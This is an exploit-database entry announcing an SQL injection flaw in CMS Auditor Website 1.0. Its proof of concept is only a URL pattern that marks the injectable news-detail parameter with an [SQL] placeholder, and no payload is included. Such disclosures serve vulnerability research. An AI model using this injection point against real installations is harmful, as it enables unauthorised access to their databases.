CMS Auditor Website 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-12-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43272/
  • # # # # # 
    # Exploit Title: CMS Auditor Website 1.0 - SQL Injection
    # Dork: N/A
    # Date: 08.12.2017
    # Vendor Homepage: https://www.phpscriptsmall.com/
    # Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/
    # Demo: http://74.124.215.220/~projclient/client/auditor/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # 1)
    # http://localhost/[PATH]/news-detail/47[SQL]
    # 
    # 
    # # # # #